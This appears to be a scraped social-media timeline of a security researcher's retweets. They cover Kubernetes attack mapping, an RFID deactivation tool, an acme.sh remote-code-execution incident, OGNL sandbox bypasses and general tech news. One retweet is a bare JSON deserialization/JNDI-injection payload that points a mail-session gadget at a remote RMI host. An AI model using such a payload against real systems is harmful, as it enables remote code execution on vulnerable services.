Joined May 2007
- Tweets 5,149
- Following 1,555
- Followers 1,882
- Likes 7,690
142 Photos and videos
Chris Frohoff retweeted
2 Oct 2023
Very slick. And a good reminder to keep car keys in a Faraday pouch when not using them
12
84
350
202,990
Chris Frohoff retweeted
2 Oct 2023
Datadog's security team has just released KubeHound, an open-source attack mapping tool for Kubernetes clusters
securitylabs.datadoghq.com/a…
kubehound.io/
Comes with 25 attack types, each one comes with step by step instructions of how to exploit it
3
129
335
36,387
Chris Frohoff retweeted
6 Sep 2023
UHFKILL via Lab401
lab401.com/products/uhfkill
The UHF RFID deactivation tool.Wirelessly and permanently disable UHF tags.A must have for OpSec/Operational Teams to deactivate tags embedded in clothing, shoes and products that can be used for tracking, identification and detection.
1
16
41
3,631
Chris Frohoff retweeted
5 Sep 2023
{"@type":"org.apache.commons.mail.SimpleEmail","mailSessionFromJNDI":"rmi://hehe:1099/obj"}
6
45
6,812
Chris Frohoff retweeted
18 Jul 2023
I “jailbroke” a Google Nest Mini so that you can run your own LLM’s, agents and voice models.
Here’s a demo using it to manage all my messages (with help from @onbeeper)
🔊 on, and wait for surprise guest!
I thought hard about how to best tackle this and why, see 🧵
365
2,446
13,826
1,698,206
Chris Frohoff retweeted
17 Jul 2023
I remember when Apple proposed their CSAM scanning system in 2021, there were a lot of people complaining about the “slippery slope fallacy” and how we couldn’t just assume that content scanning would be expanded to other purposes. 23 months later: therecord.media/senate-dea-b…
37
605
1,944
637,871
Chris Frohoff retweeted
26 Jun 2023
If you want to truly understand #AWS, you need to learn how it fails. Then you can design things to work around failure. Everything fails, all the time :) Something I cover extensively in my learn.cantrill.io courses .. is failure & resilience :)
Please Retweet!
3
154
498
34,349
Chris Frohoff retweeted
13 Jun 2023
How Relational Databases Work. This post talks about how indexes and transactions work on the inside of relational databases. architecturenotes.co/things-…
23
504
2,302
314,793
Chris Frohoff retweeted
9 Jun 2023
So I just woke up and apparently I inadvertently discovered a zero-day RCE in acme.sh, and caused a Chinese CA to shut down overnight.
Props to the @neilpangxa of acme.sh for the quick fix! github.com/acmesh-official/a…
15
124
816
203,346
Chris Frohoff retweeted
8 Jun 2023
‼️A Chinese certificate authority ("HiCA", hi.cn/en/) is injecting arbitrary commands into the ACME challenge process, which acme.sh then executes on the client machine. Here's my current analysis: github.com/acmesh-official/a…
10
263
820
397,373
Chris Frohoff retweeted
21 Mar 2023
It is with profound sadness that we mourn the loss of our friend and mentor, @aloria. Kelly had an indomitable spirit, and our world is a bit darker without her.
260
255
981
536,760
This is my comprehensive blog <Apache SCXML Remote Code Execution> pyn3rd.github.io/2023/02/06/…
1
53
139
21,654
Chris Frohoff retweeted
2 Feb 2023
If you're affected by the recent NCC workforce cut and you still 💕 appsec consulting, we're still hiring @Doyensec doyensec.com/careers.html (US based) #onemore #appsec
1
10
19
5,602
Chris Frohoff retweeted
27 Jan 2023
Had some fun with OGNL sandboxes last year. Read how I bypassed Atlassian Confluence and Struts ones in my latest blog post github.blog/2023-01-27-bypas…
1
90
199
40,265
Chris Frohoff retweeted
18 Jan 2023
Today, DoNotPay is launching a chatGPT extension that reads the Terms and Conditions, leases and flags anything that is non-standard to all our customers
46
218
1,853
227,100
Chris Frohoff retweeted
15 Jan 2023
GitHub - MaximeBeasse/KeyDecoder: KeyDecoder app lets you use your smartphone or tablet to decode your mechanical keys in seconds. github.com/MaximeBeasse/KeyD…
45
1,234
5,944
653,004
Chris Frohoff retweeted
17 Oct 2022
Thanks to @iagox86 and @ErickGalinkin for their research and analysis. rapid7.com/blog/post/2022/10…
1
12
41